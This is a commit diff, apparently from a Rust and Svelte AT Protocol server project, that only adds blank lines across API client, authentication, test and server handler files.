this repo has no description

Add back some whitespaces

lewis 7e0d55c4 6f959c6c

Changed files
+1841 -10
frontend
src
tests
+11
frontend/src/App.svelte
··· 9 9 import Settings from './routes/Settings.svelte' 10 10 import Notifications from './routes/Notifications.svelte' 11 11 import RepoExplorer from './routes/RepoExplorer.svelte' 12 + 12 13 const auth = getAuthState() 14 + 13 15 $effect(() => { 14 16 initAuth() 15 17 }) 18 + 16 19 function getComponent(path: string) { 17 20 switch (path) { 18 21 case '/login': ··· 35 38 return auth.session ? Dashboard : Login 36 39 } 37 40 } 41 + 38 42 let currentPath = $derived(getCurrentPath()) 39 43 let CurrentComponent = $derived(getComponent(currentPath)) 40 44 </script> 45 + 41 46 <main> 42 47 {#if auth.loading} 43 48 <div class="loading"> ··· 47 52 <CurrentComponent /> 48 53 {/if} 49 54 </main> 55 + 50 56 <style> 51 57 :global(:root) { 52 58 --bg-primary: #fafafa; ··· 70 76 --warning-bg: #ffd; 71 77 --warning-text: #660; 72 78 } 79 + 73 80 @media (prefers-color-scheme: dark) { 74 81 :global(:root) { 75 82 --bg-primary: #1a1a1a; ··· 94 101 --warning-text: #c6c67b; 95 102 } 96 103 } 104 + 97 105 :global(body) { 98 106 margin: 0; 99 107 font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; ··· 101 109 color: var(--text-primary); 102 110 background: var(--bg-primary); 103 111 } 112 + 104 113 :global(*) { 105 114 box-sizing: border-box; 106 115 } 116 + 107 117 main { 108 118 min-height: 100vh; 109 119 background: var(--bg-primary); 110 120 } 121 + 111 122 .loading { 112 123 display: flex; 113 124 align-items: center;
+37
frontend/src/lib/api.ts
··· 1 1 const API_BASE = '/xrpc' 2 + 2 3 export class ApiError extends Error { 3 4 public did?: string 4 5 constructor(public status: number, public error: string, message: string, did?: string) { ··· 7 8 this.did = did 8 9 } 9 10 } 11 + 10 12 async function xrpc<T>(method: string, options?: { 11 13 method?: 'GET' | 'POST' 12 14 params?: Record<string, string> ··· 37 39 } 38 40 return res.json() 39 41 } 42 + 40 43 export interface Session { 41 44 did: string 42 45 handle: string ··· 47 50 accessJwt: string 48 51 refreshJwt: string 49 52 } 53 + 50 54 export interface AppPassword { 51 55 name: string 52 56 createdAt: string 53 57 } 58 + 54 59 export interface InviteCode { 55 60 code: string 56 61 available: number ··· 60 65 createdAt: string 61 66 uses: { usedBy: string; usedAt: string }[] 62 67 } 68 + 63 69 export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal' 70 + 64 71 export interface CreateAccountParams { 65 72 handle: string 66 73 email: string ··· 71 78 telegramUsername?: string 72 79 signalNumber?: string 73 80 } 81 + 74 82 export interface CreateAccountResult { 75 83 handle: string 76 84 did: string 77 85 verificationRequired: boolean 78 86 verificationChannel: string 79 87 } 88 + 80 89 export interface ConfirmSignupResult { 81 90 accessJwt: string 82 91 refreshJwt: string ··· 87 96 preferredChannel?: string 88 97 preferredChannelVerified?: boolean 89 98 } 99 + 90 100 export const api = { 91 101 async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> { 92 102 return xrpc('com.atproto.server.createAccount', { ··· 103 113 }, 104 114 }) 105 115 }, 116 + 106 117 async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> { 107 118 return xrpc('com.atproto.server.confirmSignup', { 108 119 method: 'POST', 109 120 body: { did, verificationCode }, 110 121 }) 111 122 }, 123 + 112 124 async resendVerification(did: string): Promise<{ success: boolean }> { 113 125 return xrpc('com.atproto.server.resendVerification', { 114 126 method: 'POST', 115 127 body: { did }, 116 128 }) 117 129 }, 130 + 118 131 async createSession(identifier: string, password: string): Promise<Session> { 119 132 return xrpc('com.atproto.server.createSession', { 120 133 method: 'POST', 121 134 body: { identifier, password }, 122 135 }) 123 136 }, 137 + 124 138 async getSession(token: string): Promise<Session> { 125 139 return xrpc('com.atproto.server.getSession', { token }) 126 140 }, 141 + 127 142 async refreshSession(refreshJwt: string): Promise<Session> { 128 143 return xrpc('com.atproto.server.refreshSession', { 129 144 method: 'POST', 130 145 token: refreshJwt, 131 146 }) 132 147 }, 148 + 133 149 async deleteSession(token: string): Promise<void> { 134 150 await xrpc('com.atproto.server.deleteSession', { 135 151 method: 'POST', 136 152 token, 137 153 }) 138 154 }, 155 + 139 156 async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> { 140 157 return xrpc('com.atproto.server.listAppPasswords', { token }) 141 158 }, 159 + 142 160 async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> { 143 161 return xrpc('com.atproto.server.createAppPassword', { 144 162 method: 'POST', ··· 146 164 body: { name }, 147 165 }) 148 166 }, 167 + 149 168 async revokeAppPassword(token: string, name: string): Promise<void> { 150 169 await xrpc('com.atproto.server.revokeAppPassword', { 151 170 method: 'POST', ··· 153 172 body: { name }, 154 173 }) 155 174 }, 175 + 156 176 async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> { 157 177 return xrpc('com.atproto.server.getAccountInviteCodes', { token }) 158 178 }, 179 + 159 180 async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> { 160 181 return xrpc('com.atproto.server.createInviteCode', { 161 182 method: 'POST', ··· 163 184 body: { useCount }, 164 185 }) 165 186 }, 187 + 166 188 async requestPasswordReset(email: string): Promise<void> { 167 189 await xrpc('com.atproto.server.requestPasswordReset', { 168 190 method: 'POST', 169 191 body: { email }, 170 192 }) 171 193 }, 194 + 172 195 async resetPassword(token: string, password: string): Promise<void> { 173 196 await xrpc('com.atproto.server.resetPassword', { 174 197 method: 'POST', 175 198 body: { token, password }, 176 199 }) 177 200 }, 201 + 178 202 async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> { 179 203 return xrpc('com.atproto.server.requestEmailUpdate', { 180 204 method: 'POST', 181 205 token, 182 206 }) 183 207 }, 208 + 184 209 async updateEmail(token: string, email: string, emailToken?: string): Promise<void> { 185 210 await xrpc('com.atproto.server.updateEmail', { 186 211 method: 'POST', ··· 188 213 body: { email, token: emailToken }, 189 214 }) 190 215 }, 216 + 191 217 async updateHandle(token: string, handle: string): Promise<void> { 192 218 await xrpc('com.atproto.identity.updateHandle', { 193 219 method: 'POST', ··· 195 221 body: { handle }, 196 222 }) 197 223 }, 224 + 198 225 async requestAccountDelete(token: string): Promise<void> { 199 226 await xrpc('com.atproto.server.requestAccountDelete', { 200 227 method: 'POST', 201 228 token, 202 229 }) 203 230 }, 231 + 204 232 async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> { 205 233 await xrpc('com.atproto.server.deleteAccount', { 206 234 method: 'POST', 207 235 body: { did, password, token: deleteToken }, 208 236 }) 209 237 }, 238 + 210 239 async describeServer(): Promise<{ 211 240 availableUserDomains: string[] 212 241 inviteCodeRequired: boolean ··· 214 243 }> { 215 244 return xrpc('com.atproto.server.describeServer') 216 245 }, 246 + 217 247 async getNotificationPrefs(token: string): Promise<{ 218 248 preferredChannel: string 219 249 email: string ··· 226 256 }> { 227 257 return xrpc('com.bspds.account.getNotificationPrefs', { token }) 228 258 }, 259 + 229 260 async updateNotificationPrefs(token: string, prefs: { 230 261 preferredChannel?: string 231 262 discordId?: string ··· 238 269 body: prefs, 239 270 }) 240 271 }, 272 + 241 273 async describeRepo(token: string, repo: string): Promise<{ 242 274 handle: string 243 275 did: string ··· 250 282 params: { repo }, 251 283 }) 252 284 }, 285 + 253 286 async listRecords(token: string, repo: string, collection: string, options?: { 254 287 limit?: number 255 288 cursor?: string ··· 264 297 if (options?.reverse) params.reverse = 'true' 265 298 return xrpc('com.atproto.repo.listRecords', { token, params }) 266 299 }, 300 + 267 301 async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{ 268 302 uri: string 269 303 cid: string ··· 274 308 params: { repo, collection, rkey }, 275 309 }) 276 310 }, 311 + 277 312 async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{ 278 313 uri: string 279 314 cid: string ··· 284 319 body: { repo, collection, record, rkey }, 285 320 }) 286 321 }, 322 + 287 323 async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{ 288 324 uri: string 289 325 cid: string ··· 294 330 body: { repo, collection, rkey, record }, 295 331 }) 296 332 }, 333 + 297 334 async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> { 298 335 await xrpc('com.atproto.repo.deleteRecord', { 299 336 method: 'POST',
+16
frontend/src/lib/auth.svelte.ts
··· 1 1 import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api' 2 + 2 3 const STORAGE_KEY = 'bspds_session' 4 + 3 5 interface AuthState { 4 6 session: Session | null 5 7 loading: boolean 6 8 error: string | null 7 9 } 10 + 8 11 let state = $state<AuthState>({ 9 12 session: null, 10 13 loading: true, 11 14 error: null, 12 15 }) 16 + 13 17 function saveSession(session: Session | null) { 14 18 if (session) { 15 19 localStorage.setItem(STORAGE_KEY, JSON.stringify(session)) ··· 17 21 localStorage.removeItem(STORAGE_KEY) 18 22 } 19 23 } 24 + 20 25 function loadSession(): Session | null { 21 26 const stored = localStorage.getItem(STORAGE_KEY) 22 27 if (stored) { ··· 28 33 } 29 34 return null 30 35 } 36 + 31 37 export async function initAuth() { 32 38 state.loading = true 33 39 state.error = null ··· 54 60 } 55 61 state.loading = false 56 62 } 63 + 57 64 export async function login(identifier: string, password: string): Promise<void> { 58 65 state.loading = true 59 66 state.error = null ··· 72 79 state.loading = false 73 80 } 74 81 } 82 + 75 83 export async function register(params: CreateAccountParams): Promise<CreateAccountResult> { 76 84 try { 77 85 const result = await api.createAccount(params) ··· 85 93 throw e 86 94 } 87 95 } 96 + 88 97 export async function confirmSignup(did: string, verificationCode: string): Promise<void> { 89 98 state.loading = true 90 99 state.error = null ··· 113 122 state.loading = false 114 123 } 115 124 } 125 + 116 126 export async function resendVerification(did: string): Promise<void> { 117 127 try { 118 128 await api.resendVerification(did) ··· 123 133 throw new Error('Failed to resend verification code') 124 134 } 125 135 } 136 + 126 137 export async function logout(): Promise<void> { 127 138 if (state.session) { 128 139 try { ··· 134 145 state.session = null 135 146 saveSession(null) 136 147 } 148 + 137 149 export function getAuthState() { 138 150 return state 139 151 } 152 + 140 153 export function getToken(): string | null { 141 154 return state.session?.accessJwt ?? null 142 155 } 156 + 143 157 export function isAuthenticated(): boolean { 144 158 return state.session !== null 145 159 } 160 + 146 161 export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) { 147 162 state.session = newState.session 148 163 state.loading = newState.loading 149 164 state.error = newState.error 150 165 } 166 + 151 167 export function _testReset() { 152 168 state.session = null 153 169 state.loading = true
+3
frontend/src/lib/router.svelte.ts
··· 1 1 let currentPath = $state(window.location.hash.slice(1) || '/') 2 + 2 3 window.addEventListener('hashchange', () => { 3 4 currentPath = window.location.hash.slice(1) || '/' 4 5 }) 6 + 5 7 export function navigate(path: string) { 6 8 window.location.hash = path 7 9 } 10 + 8 11 export function getCurrentPath() { 9 12 return currentPath 10 13 }
+2
frontend/src/main.ts
··· 1 1 import App from './App.svelte' 2 2 import { mount } from 'svelte' 3 + 3 4 const app = mount(App, { 4 5 target: document.getElementById('app')!, 5 6 }) 7 + 6 8 export default app
+4
frontend/src/tests/setup.ts
··· 1 1 import '@testing-library/jest-dom/vitest' 2 2 import { vi, beforeEach, afterEach } from 'vitest' 3 3 import { _testReset } from '../lib/auth.svelte' 4 + 4 5 let locationHash = '' 6 + 5 7 Object.defineProperty(window, 'location', { 6 8 value: { 7 9 get hash() { return locationHash }, ··· 19 21 writable: true, 20 22 configurable: true, 21 23 }) 24 + 22 25 beforeEach(() => { 23 26 vi.clearAllMocks() 24 27 localStorage.clear() ··· 26 29 locationHash = '' 27 30 _testReset() 28 31 }) 32 + 29 33 afterEach(() => { 30 34 vi.restoreAllMocks() 31 35 })
+7
frontend/src/tests/utils.ts
··· 1 1 import { render, type RenderResult } from '@testing-library/svelte' 2 2 import { tick } from 'svelte' 3 3 import type { ComponentType } from 'svelte' 4 + 4 5 export async function renderAndWait<T extends ComponentType>( 5 6 component: T, 6 7 options?: Parameters<typeof render>[1] ··· 10 11 await new Promise(resolve => setTimeout(resolve, 0)) 11 12 return result 12 13 } 14 + 13 15 export async function waitForElement( 14 16 queryFn: () => HTMLElement | null, 15 17 timeout = 1000 ··· 22 24 } 23 25 throw new Error('Element not found within timeout') 24 26 } 27 + 25 28 export async function waitForElementToDisappear( 26 29 queryFn: () => HTMLElement | null, 27 30 timeout = 1000 ··· 34 37 } 35 38 throw new Error('Element still present after timeout') 36 39 } 40 + 37 41 export async function waitForText( 38 42 container: HTMLElement, 39 43 text: string | RegExp, ··· 49 53 } 50 54 throw new Error(`Text "${text}" not found within timeout`) 51 55 } 56 + 52 57 export function mockLocalStorage(initialData: Record<string, string> = {}): void { 53 58 const store: Record<string, string> = { ...initialData } 54 59 Object.defineProperty(window, 'localStorage', { ··· 63 68 writable: true, 64 69 }) 65 70 } 71 + 66 72 export function setAuthState(session: { 67 73 did: string 68 74 handle: string ··· 73 79 }): void { 74 80 localStorage.setItem('session', JSON.stringify(session)) 75 81 } 82 + 76 83 export function clearAuthState(): void { 77 84 localStorage.removeItem('session') 78 85 }
+1
src/api/actor/mod.rs
··· 1 1 mod preferences; 2 2 mod profile; 3 + 3 4 pub use preferences::{get_preferences, put_preferences}; 4 5 pub use profile::{get_profile, get_profiles};
+3
src/api/actor/preferences.rs
··· 7 7 }; 8 8 use serde::{Deserialize, Serialize}; 9 9 use serde_json::{json, Value}; 10 + 10 11 const APP_BSKY_NAMESPACE: &str = "app.bsky"; 11 12 const MAX_PREFERENCES_COUNT: usize = 100; 12 13 const MAX_PREFERENCE_SIZE: usize = 10_000; 14 + 13 15 #[derive(Serialize)] 14 16 pub struct GetPreferencesOutput { 15 17 pub preferences: Vec<Value>, ··· 84 86 .collect(); 85 87 (StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response() 86 88 } 89 + 87 90 #[derive(Deserialize)] 88 91 pub struct PutPreferencesInput { 89 92 pub preferences: Vec<Value>,
+9
src/api/actor/profile.rs
··· 11 11 use serde_json::{json, Value}; 12 12 use std::collections::HashMap; 13 13 use tracing::{error, info}; 14 + 14 15 #[derive(Deserialize)] 15 16 pub struct GetProfileParams { 16 17 pub actor: String, 17 18 } 19 + 18 20 #[derive(Deserialize)] 19 21 pub struct GetProfilesParams { 20 22 pub actors: String, 21 23 } 24 + 22 25 #[derive(Serialize, Deserialize, Clone)] 23 26 #[serde(rename_all = "camelCase")] 24 27 pub struct ProfileViewDetailed { ··· 35 38 #[serde(flatten)] 36 39 pub extra: HashMap<String, Value>, 37 40 } 41 + 38 42 #[derive(Serialize, Deserialize)] 39 43 pub struct GetProfilesOutput { 40 44 pub profiles: Vec<ProfileViewDetailed>, 41 45 } 46 + 42 47 async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> { 43 48 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 44 49 .fetch_optional(&state.db) ··· 55 60 let block_bytes = state.block_store.get(&cid).await.ok()??; 56 61 serde_ipld_dagcbor::from_slice(&block_bytes).ok() 57 62 } 63 + 58 64 fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) { 59 65 if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) { 60 66 profile.display_name = Some(display_name.to_string()); ··· 63 69 profile.description = Some(description.to_string()); 64 70 } 65 71 } 72 + 66 73 async fn proxy_to_appview( 67 74 method: &str, 68 75 params: &HashMap<String, String>, ··· 104 111 } 105 112 } 106 113 } 114 + 107 115 pub async fn get_profile( 108 116 State(state): State<AppState>, 109 117 headers: axum::http::HeaderMap, ··· 146 154 } 147 155 (StatusCode::OK, Json(profile)).into_response() 148 156 } 157 + 149 158 pub async fn get_profiles( 150 159 State(state): State<AppState>, 151 160 headers: axum::http::HeaderMap,
+2
src/api/admin/account/delete.rs
··· 8 8 use serde::Deserialize; 9 9 use serde_json::json; 10 10 use tracing::{error, warn}; 11 + 11 12 #[derive(Deserialize)] 12 13 pub struct DeleteAccountInput { 13 14 pub did: String, 14 15 } 16 + 15 17 pub async fn delete_account( 16 18 State(state): State<AppState>, 17 19 headers: axum::http::HeaderMap,
+3
src/api/admin/account/email.rs
··· 8 8 use serde::{Deserialize, Serialize}; 9 9 use serde_json::json; 10 10 use tracing::{error, warn}; 11 + 11 12 #[derive(Deserialize)] 12 13 #[serde(rename_all = "camelCase")] 13 14 pub struct SendEmailInput { ··· 17 18 pub subject: Option<String>, 18 19 pub comment: Option<String>, 19 20 } 21 + 20 22 #[derive(Serialize)] 21 23 pub struct SendEmailOutput { 22 24 pub sent: bool, 23 25 } 26 + 24 27 pub async fn send_email( 25 28 State(state): State<AppState>, 26 29 headers: axum::http::HeaderMap,
+6
src/api/admin/account/info.rs
··· 8 8 use serde::{Deserialize, Serialize}; 9 9 use serde_json::json; 10 10 use tracing::error; 11 + 11 12 #[derive(Deserialize)] 12 13 pub struct GetAccountInfoParams { 13 14 pub did: String, 14 15 } 16 + 15 17 #[derive(Serialize)] 16 18 #[serde(rename_all = "camelCase")] 17 19 pub struct AccountInfo { ··· 24 26 pub email_confirmed_at: Option<String>, 25 27 pub deactivated_at: Option<String>, 26 28 } 29 + 27 30 #[derive(Serialize)] 28 31 #[serde(rename_all = "camelCase")] 29 32 pub struct GetAccountInfosOutput { 30 33 pub infos: Vec<AccountInfo>, 31 34 } 35 + 32 36 pub async fn get_account_info( 33 37 State(state): State<AppState>, 34 38 headers: axum::http::HeaderMap, ··· 92 96 } 93 97 } 94 98 } 99 + 95 100 #[derive(Deserialize)] 96 101 pub struct GetAccountInfosParams { 97 102 pub dids: String, 98 103 } 104 + 99 105 pub async fn get_account_infos( 100 106 State(state): State<AppState>, 101 107 headers: axum::http::HeaderMap,
+1
src/api/admin/account/mod.rs
··· 3 3 mod info; 4 4 mod profile; 5 5 mod update; 6 + 6 7 pub use delete::{delete_account, DeleteAccountInput}; 7 8 pub use email::{send_email, SendEmailInput, SendEmailOutput}; 8 9 pub use info::{
+6
src/api/admin/account/update.rs
··· 8 8 use serde::Deserialize; 9 9 use serde_json::json; 10 10 use tracing::error; 11 + 11 12 #[derive(Deserialize)] 12 13 pub struct UpdateAccountEmailInput { 13 14 pub account: String, 14 15 pub email: String, 15 16 } 17 + 16 18 pub async fn update_account_email( 17 19 State(state): State<AppState>, 18 20 headers: axum::http::HeaderMap, ··· 59 61 } 60 62 } 61 63 } 64 + 62 65 #[derive(Deserialize)] 63 66 pub struct UpdateAccountHandleInput { 64 67 pub did: String, 65 68 pub handle: String, 66 69 } 70 + 67 71 pub async fn update_account_handle( 68 72 State(state): State<AppState>, 69 73 headers: axum::http::HeaderMap, ··· 139 143 } 140 144 } 141 145 } 146 + 142 147 #[derive(Deserialize)] 143 148 pub struct UpdateAccountPasswordInput { 144 149 pub did: String, 145 150 pub password: String, 146 151 } 152 + 147 153 pub async fn update_account_password( 148 154 State(state): State<AppState>, 149 155 headers: axum::http::HeaderMap,
+11
src/api/admin/invite.rs
··· 8 8 use serde::{Deserialize, Serialize}; 9 9 use serde_json::json; 10 10 use tracing::error; 11 + 11 12 #[derive(Deserialize)] 12 13 #[serde(rename_all = "camelCase")] 13 14 pub struct DisableInviteCodesInput { 14 15 pub codes: Option<Vec<String>>, 15 16 pub accounts: Option<Vec<String>>, 16 17 } 18 + 17 19 pub async fn disable_invite_codes( 18 20 State(state): State<AppState>, 19 21 headers: axum::http::HeaderMap, ··· 51 53 } 52 54 (StatusCode::OK, Json(json!({}))).into_response() 53 55 } 56 + 54 57 #[derive(Deserialize)] 55 58 pub struct GetInviteCodesParams { 56 59 pub sort: Option<String>, 57 60 pub limit: Option<i64>, 58 61 pub cursor: Option<String>, 59 62 } 63 + 60 64 #[derive(Serialize)] 61 65 #[serde(rename_all = "camelCase")] 62 66 pub struct InviteCodeInfo { ··· 68 72 pub created_at: String, 69 73 pub uses: Vec<InviteCodeUseInfo>, 70 74 } 75 + 71 76 #[derive(Serialize)] 72 77 #[serde(rename_all = "camelCase")] 73 78 pub struct InviteCodeUseInfo { 74 79 pub used_by: String, 75 80 pub used_at: String, 76 81 } 82 + 77 83 #[derive(Serialize)] 78 84 pub struct GetInviteCodesOutput { 79 85 pub cursor: Option<String>, 80 86 pub codes: Vec<InviteCodeInfo>, 81 87 } 88 + 82 89 pub async fn get_invite_codes( 83 90 State(state): State<AppState>, 84 91 headers: axum::http::HeaderMap, ··· 192 199 ) 193 200 .into_response() 194 201 } 202 + 195 203 #[derive(Deserialize)] 196 204 pub struct DisableAccountInvitesInput { 197 205 pub account: String, 198 206 } 207 + 199 208 pub async fn disable_account_invites( 200 209 State(state): State<AppState>, 201 210 headers: axum::http::HeaderMap, ··· 241 250 } 242 251 } 243 252 } 253 + 244 254 #[derive(Deserialize)] 245 255 pub struct EnableAccountInvitesInput { 246 256 pub account: String, 247 257 } 258 + 248 259 pub async fn enable_account_invites( 249 260 State(state): State<AppState>, 250 261 headers: axum::http::HeaderMap,
+1
src/api/admin/mod.rs
··· 1 1 pub mod account; 2 2 pub mod invite; 3 3 pub mod status; 4 + 4 5 pub use account::{ 5 6 create_profile, create_record_admin, delete_account, get_account_info, get_account_infos, 6 7 send_email, update_account_email, update_account_handle, update_account_password,
+7
src/api/admin/status.rs
··· 8 8 use serde::{Deserialize, Serialize}; 9 9 use serde_json::json; 10 10 use tracing::{error, warn}; 11 + 11 12 #[derive(Deserialize)] 12 13 pub struct GetSubjectStatusParams { 13 14 pub did: Option<String>, 14 15 pub uri: Option<String>, 15 16 pub blob: Option<String>, 16 17 } 18 + 17 19 #[derive(Serialize)] 18 20 pub struct SubjectStatus { 19 21 pub subject: serde_json::Value, 20 22 pub takedown: Option<StatusAttr>, 21 23 pub deactivated: Option<StatusAttr>, 22 24 } 25 + 23 26 #[derive(Serialize)] 24 27 #[serde(rename_all = "camelCase")] 25 28 pub struct StatusAttr { 26 29 pub applied: bool, 27 30 pub r#ref: Option<String>, 28 31 } 32 + 29 33 pub async fn get_subject_status( 30 34 State(state): State<AppState>, 31 35 headers: axum::http::HeaderMap, ··· 184 188 ) 185 189 .into_response() 186 190 } 191 + 187 192 #[derive(Deserialize)] 188 193 #[serde(rename_all = "camelCase")] 189 194 pub struct UpdateSubjectStatusInput { ··· 191 196 pub takedown: Option<StatusAttrInput>, 192 197 pub deactivated: Option<StatusAttrInput>, 193 198 } 199 + 194 200 #[derive(Deserialize)] 195 201 pub struct StatusAttrInput { 196 202 pub apply: bool, 197 203 pub r#ref: Option<String>, 198 204 } 205 + 199 206 pub async fn update_subject_status( 200 207 State(state): State<AppState>, 201 208 headers: axum::http::HeaderMap,
+7
src/api/error.rs
··· 4 4 response::{IntoResponse, Response}, 5 5 }; 6 6 use serde::Serialize; 7 + 7 8 #[derive(Debug, Serialize)] 8 9 struct ErrorBody { 9 10 error: &'static str, 10 11 #[serde(skip_serializing_if = "Option::is_none")] 11 12 message: Option<String>, 12 13 } 14 + 13 15 #[derive(Debug)] 14 16 pub enum ApiError { 15 17 InternalError, ··· 46 48 UpstreamUnavailable(String), 47 49 UpstreamError { status: u16, error: Option<String>, message: Option<String> }, 48 50 } 51 + 49 52 impl ApiError { 50 53 fn status_code(&self) -> StatusCode { 51 54 match self { ··· 144 147 Self::UpstreamError { status, error: None, message: None } 145 148 } 146 149 } 150 + 147 151 impl IntoResponse for ApiError { 148 152 fn into_response(self) -> Response { 149 153 let body = ErrorBody { ··· 153 157 (self.status_code(), Json(body)).into_response() 154 158 } 155 159 } 160 + 156 161 impl From<sqlx::Error> for ApiError { 157 162 fn from(e: sqlx::Error) -> Self { 158 163 tracing::error!("Database error: {:?}", e); 159 164 Self::DatabaseError 160 165 } 161 166 } 167 + 162 168 impl From<crate::auth::TokenValidationError> for ApiError { 163 169 fn from(e: crate::auth::TokenValidationError) -> Self { 164 170 match e { ··· 169 175 } 170 176 } 171 177 } 178 + 172 179 impl From<crate::util::DbLookupError> for ApiError { 173 180 fn from(e: crate::util::DbLookupError) -> Self { 174 181 match e {
+3
src/api/feed/actor_likes.rs
··· 13 13 use serde_json::Value; 14 14 use std::collections::HashMap; 15 15 use tracing::warn; 16 + 16 17 #[derive(Deserialize)] 17 18 pub struct GetActorLikesParams { 18 19 pub actor: String, 19 20 pub limit: Option<u32>, 20 21 pub cursor: Option<String>, 21 22 } 23 + 22 24 fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) { 23 25 for like in likes { 24 26 let like_time = &like.indexed_at.to_rfc3339(); ··· 57 59 ); 58 60 } 59 61 } 62 + 60 63 pub async fn get_actor_likes( 61 64 State(state): State<AppState>, 62 65 headers: axum::http::HeaderMap,
+3
src/api/feed/author_feed.rs
··· 13 13 use serde::Deserialize; 14 14 use std::collections::HashMap; 15 15 use tracing::warn; 16 + 16 17 #[derive(Deserialize)] 17 18 pub struct GetAuthorFeedParams { 18 19 pub actor: String, ··· 22 23 #[serde(rename = "includePins")] 23 24 pub include_pins: Option<bool>, 24 25 } 26 + 25 27 fn update_author_profile_in_feed( 26 28 feed: &mut [FeedViewPost], 27 29 author_did: &str, ··· 35 37 } 36 38 } 37 39 } 40 + 38 41 pub async fn get_author_feed( 39 42 State(state): State<AppState>, 40 43 headers: axum::http::HeaderMap,
+2
src/api/feed/custom_feed.rs
··· 11 11 use serde::Deserialize; 12 12 use std::collections::HashMap; 13 13 use tracing::{error, info}; 14 + 14 15 #[derive(Deserialize)] 15 16 pub struct GetFeedParams { 16 17 pub feed: String, 17 18 pub limit: Option<u32>, 18 19 pub cursor: Option<String>, 19 20 } 21 + 20 22 pub async fn get_feed( 21 23 State(state): State<AppState>, 22 24 headers: axum::http::HeaderMap,
+1
src/api/feed/mod.rs
··· 3 3 mod custom_feed; 4 4 mod post_thread; 5 5 mod timeline; 6 + 6 7 pub use actor_likes::get_actor_likes; 7 8 pub use author_feed::get_author_feed; 8 9 pub use custom_feed::get_feed;
+10
src/api/feed/post_thread.rs
··· 13 13 use serde_json::{json, Value}; 14 14 use std::collections::HashMap; 15 15 use tracing::warn; 16 + 16 17 #[derive(Deserialize)] 17 18 pub struct GetPostThreadParams { 18 19 pub uri: String, ··· 20 21 #[serde(rename = "parentHeight")] 21 22 pub parent_height: Option<u32>, 22 23 } 24 + 23 25 #[derive(Debug, Clone, Serialize, Deserialize)] 24 26 #[serde(rename_all = "camelCase")] 25 27 pub struct ThreadViewPost { ··· 33 35 #[serde(flatten)] 34 36 pub extra: HashMap<String, Value>, 35 37 } 38 + 36 39 #[derive(Debug, Clone, Serialize, Deserialize)] 37 40 #[serde(untagged)] 38 41 pub enum ThreadNode { ··· 40 43 NotFound(ThreadNotFound), 41 44 Blocked(ThreadBlocked), 42 45 } 46 + 43 47 #[derive(Debug, Clone, Serialize, Deserialize)] 44 48 #[serde(rename_all = "camelCase")] 45 49 pub struct ThreadNotFound { ··· 48 52 pub uri: String, 49 53 pub not_found: bool, 50 54 } 55 + 51 56 #[derive(Debug, Clone, Serialize, Deserialize)] 52 57 #[serde(rename_all = "camelCase")] 53 58 pub struct ThreadBlocked { ··· 57 62 pub blocked: bool, 58 63 pub author: Value, 59 64 } 65 + 60 66 #[derive(Debug, Clone, Serialize, Deserialize)] 61 67 pub struct PostThreadOutput { 62 68 pub thread: ThreadNode, 63 69 #[serde(skip_serializing_if = "Option::is_none")] 64 70 pub threadgate: Option<Value>, 65 71 } 72 + 66 73 const MAX_THREAD_DEPTH: usize = 10; 74 + 67 75 fn add_replies_to_thread( 68 76 thread: &mut ThreadViewPost, 69 77 local_posts: &[RecordDescript<PostRecord>], ··· 111 119 } 112 120 } 113 121 } 122 + 114 123 pub async fn get_post_thread( 115 124 State(state): State<AppState>, 116 125 headers: axum::http::HeaderMap, ··· 190 199 let lag = get_local_lag(&local_records); 191 200 format_munged_response(thread_output, lag) 192 201 } 202 + 193 203 async fn handle_not_found( 194 204 state: &AppState, 195 205 uri: &str,
+4
src/api/feed/timeline.rs
··· 15 15 use serde_json::{json, Value}; 16 16 use std::collections::HashMap; 17 17 use tracing::warn; 18 + 18 19 #[derive(Deserialize)] 19 20 pub struct GetTimelineParams { 20 21 pub algorithm: Option<String>, 21 22 pub limit: Option<u32>, 22 23 pub cursor: Option<String>, 23 24 } 25 + 24 26 pub async fn get_timeline( 25 27 State(state): State<AppState>, 26 28 headers: axum::http::HeaderMap, ··· 56 58 } 57 59 get_timeline_local_only(&state, &auth_user.did).await 58 60 } 61 + 59 62 async fn get_timeline_with_appview( 60 63 state: &AppState, 61 64 headers: &axum::http::HeaderMap, ··· 123 126 let lag = get_local_lag(&local_records); 124 127 format_munged_response(feed_output, lag) 125 128 } 129 + 126 130 async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response { 127 131 let user_id: uuid::Uuid = match sqlx::query_scalar!( 128 132 "SELECT id FROM users WHERE did = $1",
+4
src/api/identity/account.rs
